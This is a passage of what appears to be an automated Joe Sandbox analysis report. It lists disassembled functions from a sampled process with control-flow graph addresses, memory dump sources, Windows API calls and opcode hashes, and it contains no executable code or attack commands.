                                                    Function 077BE7E0 Relevance: 11.0, Strings: 8, Instructions: 971COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 77be7e0-77be7ff 295 77be9ad-77be9fe 294->295 296 77be805-77be80b 294->296 329 77bea18-77bea32 295->329 330 77bea00-77bea0d 295->330 297 77be80d-77be814 296->297 298 77be84c-77be860 296->298 299 77be82e-77be847 call 77bcfc0 297->299 300 77be816-77be823 297->300 301 77be882-77be88b 298->301 302 77be862-77be866 298->302 299->298 300->299 304 77be88d-77be89a 301->304 305 77be8a5-77be8c1 301->305 302->301 306 77be868-77be874 302->306 304->305 318 77be969-77be98d 305->318 319 77be8c7-77be8d2 305->319 306->301 315 77be876-77be87c 306->315 315->301 331 77be98f 318->331 332 77be997 318->332 325 77be8ea-77be8f1 319->325 326 77be8d4-77be8da 319->326 327 77be8f3-77be8fd 325->327 328 77be905-77be928 call 77b89d4 325->328 333 77be8de-77be8e0 326->333 334 77be8dc 326->334 327->328 340 77be92a-77be937 328->340 341 77be939-77be94a 328->341 342 77bea79-77bea80 329->342 343 77bea34-77bea3b 329->343 330->329 331->332 332->295 333->325 334->325 340->341 353 77be957-77be963 340->353 352 77be94c-77be94f 341->352 341->353 344 77bea9a-77beaa3 342->344 345 77bea82-77bea8f 342->345 346 77bea3d-77bea4a 343->346 347 77bea55-77bea6a 343->347 349 77beaa9-77beaac 344->349 350 77beaa5-77beaa7 344->350 345->344 346->347 347->342 358 77bea6c-77bea73 347->358 355 77beaad-77beab1 349->355 350->355 352->353 353->318 353->319 359 77beab9-77beabe 355->359 358->342 361 77beb07 358->361 362 77beb01-77beb04 359->362 363 77beac0-77beac7 359->363 364 77beb0a-77beb32 361->364 365 77beac9-77bead6 363->365 366 77beae1-77beaf6 363->366 372 77beb39-77beb70 364->372 365->366 366->362 371 77beaf8-77beaff 366->371 371->362 371->372 372->364 380 77beb72-77beb9a 372->380 381 77beb9c-77bebaf 380->381 382 77bebb2-77bebb8 380->382 383 77bebba-77bebc1 382->383 384 77bec28-77bec80 382->384 386 77bec87-77becdf 383->386 387 77bebc7-77bebd7 383->387 384->386 392 77bece6-77bedf4 386->392 391 77bebdd-77bebe1 387->391 387->392 395 77bebe4-77bebe6 391->395 434 77bee46-77bee9e 392->434 435 77bedf6-77bee06 392->435 396 77bec0b-77bec0d 395->396 397 77bebe8-77bebf8 395->397 400 77bec0f-77bec19 396->400 401 77bec1c-77bec25 396->401 407 77bebfa-77bec09 397->407 408 77bebe3 397->408 407->396 407->408 408->395 439 77beea5-77befb2 434->439 438 77bee0c-77bee10 435->438 435->439 441 77bee13-77bee15 438->441 473 77befca-77befd0 439->473 474 77befb4-77befc7 439->474 443 77bee29-77bee2b 441->443 444 77bee17-77bee27 441->444 446 77bee3a-77bee43 443->446 447 77bee2d-77bee37 443->447 444->443 451 77bee12 444->451 451->441 475 77bf04a-77bf0a2 473->475 476 77befd2-77befd9 473->476 478 77bf0a9-77bf101 475->478 476->478 479 77befdf-77befe3 476->479 481 77bf108-77bf183 478->481 480 77befe9-77befed 479->480 479->481 483 77beff0-77beffd 480->483 518 77bf184-77bf1e8 481->518 490 77befff-77bf00f 483->490 491 77bf022-77bf02f 483->491 498 77befef 490->498 499 77bf011-77bf020 490->499 501 77bf03e-77bf047 491->501 502 77bf031-77bf03b 491->502 498->483 499->491 499->498 527 77bf1ea-77bf20c 518->527 528 77bf268-77bf2c0 527->528 529 77bf20e-77bf212 527->529 531 77bf2c7-77bf3c0 528->531 530 77bf218-77bf21c 529->530 529->531 533 77bf21f-77bf22c 530->533 569 77bf3d8-77bf3d9 531->569 570 77bf3c2-77bf3c8 531->570 538 77bf22e-77bf23e 533->538 539 77bf240-77bf24d 533->539 538->539 547 77bf21e 538->547 544 77bf24f-77bf259 539->544 545 77bf25c-77bf265 539->545 547->533 571 77bf3ca 570->571 572 77bf3cc-77bf3ce 570->572 571->569 572->569
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq$Hbq$Hbq$Hbq$Hbq$Hbq$Hbq$PH^q
                                                    • API String ID: 0-3076519024
                                                    • Opcode ID: a6ec978617597e45783612f30de316363132d3a95c7e66ff6aed7fa4c5458c79
                                                    • Instruction ID: 7dbe48fbe14060cb1af158b4b9d97359d03168995bf6df17ec604ac4293f1642
                                                    • Opcode Fuzzy Hash: a6ec978617597e45783612f30de316363132d3a95c7e66ff6aed7fa4c5458c79
                                                    • Instruction Fuzzy Hash: 4B72C0717002158FCB58AB78C8587AE7BA6FFC8350F248569E50ADB3A4CE30DD46C7A1
                                                    Function 077B2106 Relevance: 1.8, Strings: 1, Instructions: 561COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 713 77b2106-77b210a 714 77b210b-77b2120 713->714 715 77b2acd-77b2add 713->715 714->715 716 77b2121-77b212c 714->716 718 77b2132-77b213e 716->718 719 77b214a-77b2159 718->719 721 77b21b8-77b21bc 719->721 722 77b21c2-77b21cb 721->722 723 77b2264-77b22ce 721->723 724 77b21d1-77b21e7 722->724 725 77b20c6-77b20d2 722->725 723->715 761 77b22d4-77b281b 723->761 731 77b2239-77b224b 724->731 732 77b21e9-77b21ec 724->732 725->715 727 77b20d8-77b20e4 725->727 729 77b215b-77b2161 727->729 730 77b20e6-77b20fa 727->730 729->715 733 77b2167-77b217f 729->733 730->729 738 77b20fc-77b2105 730->738 742 77b2a0c-77b2ac2 731->742 743 77b2251-77b2261 731->743 732->715 736 77b21f2-77b222f 732->736 733->715 741 77b2185-77b21ad 733->741 736->723 757 77b2231-77b2237 736->757 738->713 741->721 742->715 757->731 757->732 839 77b281d-77b2827 761->839 840 77b2832-77b28c5 761->840 841 77b282d 839->841 842 77b28d0-77b2963 839->842 840->842 843 77b296e-77b2a01 841->843 842->843 843->742
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: D
                                                    • API String ID: 0-2746444292
                                                    • Opcode ID: af8e176b763ac30932be25a96dab1b4e809ae3c9611ec9dce40d7ec25f4589f8
                                                    • Instruction ID: dbb7bb4ca435baa5f596af237563fad5d29bd846f6129261462e679046a8b890
                                                    • Opcode Fuzzy Hash: af8e176b763ac30932be25a96dab1b4e809ae3c9611ec9dce40d7ec25f4589f8
                                                    • Instruction Fuzzy Hash: 3952B774A05229CFCB64DF28C998A9DBBB6FF89300F1045D9D909A7365CB309E81CF54
                                                    Function 077B6CE8 Relevance: .7, Instructions: 668COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a319c1e7082afa049a9614e5c8cbe39da493f0b475346eb990d65159c90a94c
                                                    • Instruction ID: 4ef3edfb30ebe30884814d53b72e6487b3b0b72a7a9e90310d2d2ab5ae9c125b
                                                    • Opcode Fuzzy Hash: 5a319c1e7082afa049a9614e5c8cbe39da493f0b475346eb990d65159c90a94c
                                                    • Instruction Fuzzy Hash: 1C52F6706006058FCB28DF68C588B9DB7F2FF84355F2589A9E50A9B361DB31ED46CB90
                                                    Function 077B6CD8 Relevance: .3, Instructions: 291COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec7a3df81014c93afb073aa36592733430039c50e7918bb0d6a07788291783a8
                                                    • Instruction ID: be3257f230b1cc24a9ce485b461e9571030696d252a3b66e6a590b0624da903e
                                                    • Opcode Fuzzy Hash: ec7a3df81014c93afb073aa36592733430039c50e7918bb0d6a07788291783a8
                                                    • Instruction Fuzzy Hash: ECD1C8B4A00205CFDB28CF58C588B99B7F2FF84355F5585A9E505DB261DB31ED86CB80
                                                    Function 077BD570 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 595 77bd570-77bd5b6 598 77bd979-77bd9a4 595->598 599 77bd5bc-77bd5cf 595->599 611 77bd9ab-77bd9fb 598->611 602 77bd5e3-77bd609 599->602 603 77bd5d1-77bd5db 599->603 602->611 612 77bd60f-77bd625 call 77bcd34 602->612 603->602 642 77bd9fd-77bda09 611->642 643 77bda1c-77bda24 611->643 617 77bd62b-77bd645 612->617 618 77bd707-77bd70b 612->618 624 77bd65d-77bd679 617->624 625 77bd647-77bd655 617->625 619 77bd71b-77bd72b call 77bcd44 618->619 620 77bd70d-77bd713 618->620 627 77bd72d-77bd756 619->627 628 77bd762-77bd780 call 77bcd54 619->628 620->619 640 77bd67b-77bd686 624->640 641 77bd6d6-77bd6fa 624->641 625->624 638 77bd785-77bd79c call 77ba3b8 628->638 649 77bd79e-77bd7ac 638->649 650 77bd7b4-77bd7d0 638->650 651 77bd688-77bd68e 640->651 652 77bd69e-77bd6af 640->652 656 77bd6fc 641->656 657 77bd704 641->657 659 77bda11 642->659 649->650 666 77bd7d2-77bd7dd 650->666 667 77bd844-77bd868 650->667 654 77bd692-77bd694 651->654 655 77bd690 651->655 662 77bd6b1-77bd6b4 652->662 663 77bd6b6-77bd6b9 652->663 654->652 655->652 656->657 657->618 659->643 664 77bd6bc-77bd6d4 662->664 663->664 664->640 664->641 671 77bd7df-77bd7e5 666->671 672 77bd7f5-77bd802 666->672 679 77bd86a 667->679 680 77bd872 667->680 675 77bd7e9-77bd7eb 671->675 676 77bd7e7 671->676 677 77bd816-77bd842 call 77b3b64 672->677 678 77bd804-77bd810 672->678 675->672 676->672 677->666 677->667 678->677 679->680 680->598
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q$PH^q
                                                    • API String ID: 0-1598597984
                                                    • Opcode ID: 9004469fe7d4dd19171402788a9672602d36e8d892be506f02e8dbfe033d75c1
                                                    • Instruction ID: d30d3b45ef7a4e32e63be4b90cf6798877e3b0f298676656a689fe0a457cf439
                                                    • Opcode Fuzzy Hash: 9004469fe7d4dd19171402788a9672602d36e8d892be506f02e8dbfe033d75c1
                                                    • Instruction Fuzzy Hash: 14C1F4B4B00605CFCB24DF68C598A99BBF2FF89754F1549A8E406AB3A1DB31EC45CB50
                                                    Function 018DB298 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 868 18db298-18db2b7 869 18db2b9-18db2c6 call 18d9d14 868->869 870 18db2e3-18db2e7 868->870 877 18db2dc 869->877 878 18db2c8 869->878 871 18db2e9-18db2f3 870->871 872 18db2fb-18db33c 870->872 871->872 879 18db33e-18db346 872->879 880 18db349-18db357 872->880 877->870 923 18db2ce call 18db531 878->923 924 18db2ce call 18db540 878->924 879->880 881 18db359-18db35e 880->881 882 18db37b-18db37d 880->882 885 18db369 881->885 886 18db360-18db367 call 18daf10 881->886 884 18db380-18db387 882->884 883 18db2d4-18db2d6 883->877 887 18db418-18db4d8 883->887 888 18db389-18db391 884->888 889 18db394-18db39b 884->889 891 18db36b-18db379 885->891 886->891 918 18db4da-18db4dd 887->918 919 18db4e0-18db50b GetModuleHandleW 887->919 888->889 892 18db39d-18db3a5 889->892 893 18db3a8-18db3b1 call 18daf20 889->893 891->884 892->893 899 18db3be-18db3c3 893->899 900 18db3b3-18db3bb 893->900 901 18db3c5-18db3cc 899->901 902 18db3e1-18db3e5 899->902 900->899 901->902 904 18db3ce-18db3de call 18daf30 call 18daf40 901->904 905 18db3eb-18db3ee 902->905 904->902 908 18db411-18db417 905->908 909 18db3f0-18db40e 905->909 909->908 918->919 920 18db50d-18db513 919->920 921 18db514-18db528 919->921 920->921 923->883 924->883
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 018DB4FE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 640aaed2a07f5f97e2ba8bd1cbb9f64e064140f641db51df77f47348c14140d9
                                                    • Instruction ID: 155755917aedcbe55db52bda24dd7b657a62e137fc7af390b328f6eba848984f
                                                    • Opcode Fuzzy Hash: 640aaed2a07f5f97e2ba8bd1cbb9f64e064140f641db51df77f47348c14140d9
                                                    • Instruction Fuzzy Hash: C8812370A00B058FDB28DF2AD44575ABBF1FF89304F108A6DD48AD7A50DB74EA49CB91
                                                    Function 018D5AA4 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 925 18d5aa4-18d5b34
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cbdc8fa9825539badc615317da72f3b33de6102b5674eb0ea916bd20081a9bf
                                                    • Instruction ID: 926586e7318d0daceadf1f6de7905d547c39247b81834ad452fa90ab589f91e4
                                                    • Opcode Fuzzy Hash: 8cbdc8fa9825539badc615317da72f3b33de6102b5674eb0ea916bd20081a9bf
                                                    • Instruction Fuzzy Hash: 6641BAB2804359CFCB15CFA8C8847AEBFB4AF42314F54808BC409EB255D7799A4ACB42
                                                    Function 018D4508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 928 18d4508-18d59f9 CreateActCtxA 931 18d59fb-18d5a01 928->931 932 18d5a02-18d5a5c 928->932 931->932 939 18d5a5e-18d5a61 932->939 940 18d5a6b-18d5a6f 932->940 939->940 941 18d5a71-18d5a7d 940->941 942 18d5a80 940->942 941->942 944 18d5a81 942->944 944->944
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 018D59E9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 6fb46e93d6bac0b3b9ead6ca268cbb5c83be50b7b7433f41bf5ef48f1e3e9644
                                                    • Instruction ID: e9ff60b88c7dd1d38de949b7851a3f400744279b58b3bcb63889a58ef40910b2
                                                    • Opcode Fuzzy Hash: 6fb46e93d6bac0b3b9ead6ca268cbb5c83be50b7b7433f41bf5ef48f1e3e9644
                                                    • Instruction Fuzzy Hash: 1041B2B0C0071DDBDB24DFA9C884A9DBBB5BF49304F24806AD408AB255DB755949CF91
                                                    Function 018D592D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 945 18d592d-18d5933 946 18d5938-18d59f9 CreateActCtxA 945->946 948 18d59fb-18d5a01 946->948 949 18d5a02-18d5a5c 946->949 948->949 956 18d5a5e-18d5a61 949->956 957 18d5a6b-18d5a6f 949->957 956->957 958 18d5a71-18d5a7d 957->958 959 18d5a80 957->959 958->959 961 18d5a81 959->961 961->961
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 018D59E9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 03e22b0ccf532b3ed394533623b0c2d8bf4a05d188da00cff7183cc5af3d2c7d
                                                    • Instruction ID: 674167060264a9235504f2db8a49e6371e27b1f547b3f80e757b4c448b4e9150
                                                    • Opcode Fuzzy Hash: 03e22b0ccf532b3ed394533623b0c2d8bf4a05d188da00cff7183cc5af3d2c7d
                                                    • Instruction Fuzzy Hash: BD41E2B1C00719CFDB24CFA9C884B8DBBB5BF49304F2480AAD408AB255DB756A49CF91
                                                    Function 018DD2B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 962 18dd2b8-18dd81c DuplicateHandle 964 18dd81e-18dd824 962->964 965 18dd825-18dd842 962->965 964->965
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018DD74E,?,?,?,?,?), ref: 018DD80F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 59e5c8e09ac2f9a5e015d9e28d628eb7a9bf77add6d36d379db8f8a0e7b7313b
                                                    • Instruction ID: 3502abd56c9e099e62deb8cc6a230ca2a44fea1c5bbdfd4c95b6928eb8d2d0e9
                                                    • Opcode Fuzzy Hash: 59e5c8e09ac2f9a5e015d9e28d628eb7a9bf77add6d36d379db8f8a0e7b7313b
                                                    • Instruction Fuzzy Hash: DA21E3B5900348DFDB10CF9AD984ADEBFF8EB48320F14845AE958A7350D374A944CFA4
                                                    Function 018DD780 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 968 18dd780-18dd81c DuplicateHandle 969 18dd81e-18dd824 968->969 970 18dd825-18dd842 968->970 969->970
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018DD74E,?,?,?,?,?), ref: 018DD80F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 38174db0462c54460450bf602753c14f0ab59a0c8d430b04d41994ec75424a87
                                                    • Instruction ID: acadb3b8455ec116f71ad63c3ce0f406e067214c1251377210926c61ce739c7d
                                                    • Opcode Fuzzy Hash: 38174db0462c54460450bf602753c14f0ab59a0c8d430b04d41994ec75424a87
                                                    • Instruction Fuzzy Hash: F321E3B5D00219DFDB10CF99D584ADEBBF4FB48320F14842AE958A7250D374A954CFA4
                                                    Function 07C02991 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 973 7c02991-7c02995 974 7c02997-7c02a02 PostMessageW 973->974 975 7c0298c-7c02990 973->975 976 7c02a04-7c02a0a 974->976 977 7c02a0b-7c02a1f 974->977 975->973 976->977
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07C029F5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1851696129.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7c00000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 65464ceee90c7e63b0674fddd690cd5a69417b49ec25de45092ca97df87d65f4
                                                    • Instruction ID: 9160880eab94e8b81afca2e37647b553de45ba423d84c3a48e584d4f9d10762a
                                                    • Opcode Fuzzy Hash: 65464ceee90c7e63b0674fddd690cd5a69417b49ec25de45092ca97df87d65f4
                                                    • Instruction Fuzzy Hash: AB1146B58043898FCB11CF99D589BDEFFF4EB08324F14844AD454A7651C374A584CFA1
                                                    Function 07C014A4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07C029F5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1851696129.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7c00000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: MessagePost
                                                    • String ID:
                                                    • API String ID: 410705778-0
                                                    • Opcode ID: 8f71ea5c23f2a5ffa03d1ad7162351fa700b325ebcd29c615c25dad15472f181
                                                    • Instruction ID: d53c75ec1f2c9c9adc68d66c18f8d50d16c5c2dcd3ee1a4522fba31590dc7894
                                                    • Opcode Fuzzy Hash: 8f71ea5c23f2a5ffa03d1ad7162351fa700b325ebcd29c615c25dad15472f181
                                                    • Instruction Fuzzy Hash: 9911E3B58003499FDB20DF9AC488BDEBBF8FB48324F108419E559A7240D375A984CFE1
                                                    Function 018DB498 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 979 18db498-18db4d8 980 18db4da-18db4dd 979->980 981 18db4e0-18db50b GetModuleHandleW 979->981 980->981 982 18db50d-18db513 981->982 983 18db514-18db528 981->983 982->983
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 018DB4FE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1838957880.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_18d0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 8575efdc21000c6bfb30878a9252d1d757990a8382e92828a336d07f4287ae9c
                                                    • Instruction ID: 0206c5a7688d8dc149137148c32576d4159f8b7d8ec9ce431e0d1deaa1e7264b
                                                    • Opcode Fuzzy Hash: 8575efdc21000c6bfb30878a9252d1d757990a8382e92828a336d07f4287ae9c
                                                    • Instruction Fuzzy Hash: 7A1110B5C003498FDB20CF9AC444ADEFBF4EB88324F10842AD569A7210D375A645CFA1
                                                    Function 077BE7D0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH^q
                                                    • API String ID: 0-2549759414
                                                    • Opcode ID: b2fb9160062135094975f5a3a1542040f98accf1569c791f2d4b329a2f3af9f6
                                                    • Instruction ID: 33f9a18aac8ff8f061e0d48184b9f4e6028a2c3d82d6ec3220da9ea3ad28aed1
                                                    • Opcode Fuzzy Hash: b2fb9160062135094975f5a3a1542040f98accf1569c791f2d4b329a2f3af9f6
                                                    • Instruction Fuzzy Hash: 685134B0700506CFDB28CF29C998BEABBB5AF48744F148569E446DB365CB70EC44CB90
                                                    Function 077BE9AC Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (bq
                                                    • API String ID: 0-149360118
                                                    • Opcode ID: ca657fbc2d6faf44bc0786c8e473d63f426dde9c1c82e1917cba53cfc1adaefd
                                                    • Instruction ID: 5f2a414fe3c48a2e584a6a4fc3906d5271a7581d31b3f639f79127fba889e592
                                                    • Opcode Fuzzy Hash: ca657fbc2d6faf44bc0786c8e473d63f426dde9c1c82e1917cba53cfc1adaefd
                                                    • Instruction Fuzzy Hash: 304173703007018FC764DF38C859BAA7BA6BF85354F158569E55ACB3A1DF74E88ACB40
                                                    Function 077B54D8 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: f5bbd9321900ed942c39a0f9dacf1899ba3bdadad0b6c52d4e8565a679817c87
                                                    • Instruction ID: aa20c0975a63242cee76c09ea51fcb398e7b4774fcc152fd0bf4071e7ff3b15d
                                                    • Opcode Fuzzy Hash: f5bbd9321900ed942c39a0f9dacf1899ba3bdadad0b6c52d4e8565a679817c87
                                                    • Instruction Fuzzy Hash: 79015630A502099FCB44EBB8E95A69DBBB5EB48204F5045A8980597310EE34AE59CB14
                                                    Function 077B54E8 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'^q
                                                    • API String ID: 0-1614139903
                                                    • Opcode ID: 4c5b3f0b1e4f87236b4a3cabfa1e5c05149eb0bba9f5ed05e09882577527951b
                                                    • Instruction ID: 4a27f404aa82c60766c3893144fbacdebb75b1462ac8866a6310e61d5b101324
                                                    • Opcode Fuzzy Hash: 4c5b3f0b1e4f87236b4a3cabfa1e5c05149eb0bba9f5ed05e09882577527951b
                                                    • Instruction Fuzzy Hash: 63F04630E10209DFCB44EFB8E54959CBFF5FB48204B5045A8D80597310EF305E59CB54
                                                    Function 077BB62B Relevance: .4, Instructions: 410COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b000d58802956dfc68e53a2bf10ad29efe24bf83602958449e33d4286182b2cd
                                                    • Instruction ID: 96cad8f92447d9eb422c1d97190efe5b50142acb75b54e7fcd8d33842feef035
                                                    • Opcode Fuzzy Hash: b000d58802956dfc68e53a2bf10ad29efe24bf83602958449e33d4286182b2cd
                                                    • Instruction Fuzzy Hash: 7102E3B46002059FCB54DB68D498AADBBF2FF89354F1585A8E8099B376DB30EC85CB50
                                                    Function 077B3528 Relevance: .2, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1850568563.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_77b0000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
